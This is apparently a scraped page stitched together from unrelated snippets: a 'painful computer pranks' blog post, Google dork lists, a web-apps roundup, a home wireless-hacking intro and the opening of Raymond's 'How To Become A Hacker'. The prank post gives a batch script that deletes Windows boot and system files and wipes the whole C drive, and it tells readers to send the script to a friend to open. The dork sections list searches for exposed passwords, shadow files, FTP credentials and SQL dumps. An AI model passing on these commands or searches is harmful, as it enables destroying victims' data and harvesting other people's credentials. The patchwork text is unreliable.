Painfully Computer Pranks ~ Computer Hacking | Learn How To Hack
Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q 3. 1. 2. 3.
Know the Trade – Your IT Security Information Portal CISSP/CEH/CISA/Hacker and Penetration Testing Specialist
Google Hacking allintitle:Brains, Corp. camera allintitle:"index of/admin" allintitle:"index of/root" allintitle:restricted filetype:doc site:gov allintitle:restricted filetype :mail allintitle:sensitive filetype:doc allinurl:/bash_history allinurl:winnt/system32/ (get cmd.exe) ext:ini eudora.ini ext:pwd inurl:(service|authors|administrators |users) "# -FrontPage-" filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:conf slapd.conf filetype:ctt "msn" filetype:mdb inurl:"account|users|admin|administrators|passwd|password" filetype:mdb inurl:users.mdb filetype:QDF QDF filetype:pdf "Host Vulnerability Summary Report" "Assessment Report" filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" ) filetype:xls inurl:"email.xls" filetype:user eggdrop user intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) intitle:"Welcome to IIS 4.0!" These log files record info about the SSH client PUTTY.
100 Web Apps to Rule Them All
Our original roundup of 100 Web Apps to Rule Them All was published in May, 2011. Nearly a year later, we’re back with over a dozen new apps … and sadly with a few of our original favorites removed since they hit the deadpool. We’ve added the newest apps to the top of this roundup article, so you can quickly see our new favorites. Today, more than ever before, you can get much of your work done right from your browser. There’s web apps for almost everything, and increasingly they work from mobile devices, have beautifully designed interfaces that rival native apps, and work together to make your online life easier. Whether you’re just getting started using web apps, or are a longtime fan of web apps and would like to find more exciting apps, you’ll be sure to find something interesting here. Enjoy! The Newest Web Apps to Rule Them All ifttt ifttt Web apps have the bad habit of often not working together. Price: Free AppStorm Review: Use Ifttt to Make the Internet Work for You TinyLetter Lemon
Hackers' Library
I hacked my secure wireless network: here’s how it’s done
Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. How a wireless network works A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. Access points are base stations for the wireless network. The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Data streams, known as packets, are sent between the Access Point, and it’s clients. Packets and IVs
Download Youtube Videos | Youtube Video Downloader
Advanced password hacking using Google – easy to learn, easy to apply
Do you like this story? Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Lets start, shall we ? FTP passwords ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. intitle:index.of ws_ftp.ini You can also this dork which uses "parent directory" to avoid results other than directory listings filetype:ini ws_ftp pwd Or "index of/" "ws_ftp.ini" "parent directory" even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork "cache:www.abc.com/ws_ftp.ini" where www.abc.com is the site you want to check the dork for. PHP Hacking intitle:index.of config.php to view php file contents intitle:"Index of" phpinfo.php inurl:download.php? SQL Dumps
How To Become A Hacker
Copyright © 2001 Eric S. Raymond As editor of the Jargon File and author of a few other well-known documents of similar nature, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizardly hacker?". If you are reading a snapshot of this document offline, the current version lives at Note: there is a list of Frequently Asked Questions at the end of this document. Numerous translations of this document are available: ArabicBelorussianBulgarianChinese, Czech. The five-dots-in-nine-squares diagram that decorates this document is called a glider. If you find this document valuable, please support me on Patreon or SubscribeStar. The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. The hacker mind-set is not confined to this software-hacker culture. 1. 2. 3. 5. 2. 3. 4. 1. 2. 3. 4.
Delicious